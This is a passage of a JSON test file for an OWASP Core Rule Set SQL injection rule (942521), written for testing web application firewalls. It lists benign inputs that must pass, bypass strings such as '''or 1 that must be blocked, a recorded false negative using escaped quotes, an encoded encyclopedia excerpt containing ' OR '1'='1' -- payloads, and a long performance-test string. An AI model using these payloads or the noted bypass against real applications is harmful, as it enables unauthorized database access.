"post_body", "value": "var=it%20is%20your%20parents'%20and%20yours" } ] }, { "description": "Negative test: bob's or alice's", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=bob's%20or%20alice's" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=bob's%20or%20alice's" } ] }, { "description": "Negative test: mother or daugher", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=mother%20or%20daughter" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=mother%20or%20daughter" } ] }, { "description": "Negative test: 'oreo", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='oreo" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='oreo" } ] }, { "description": "Negative test: 'fork", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='fork" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='fork" } ] }, { "description": "Negative test: 'for", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='%20for" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='%20for" } ] }, { "description": "Negative test: ''or", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=''or" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=''or" } ] }, { "description": "Negative test: 'books' or 'applles'", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=''or" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=''or" } ] }, { "description": "Negative test: bob's presentation's 'or'", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=''or" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=''or" } ] }, { "description": "Bypass with '''or 1", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='''or%201" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='''or%201" } ] }, { "description": "False-negative: Not detected with escapes", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%5C'lol'%20or%20'1" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%5C'lol'%20or%20'1" } ] }, { "description": "Negative test: Wikipedia article about SQLi", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" } ] }, { "description": "Performance test", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%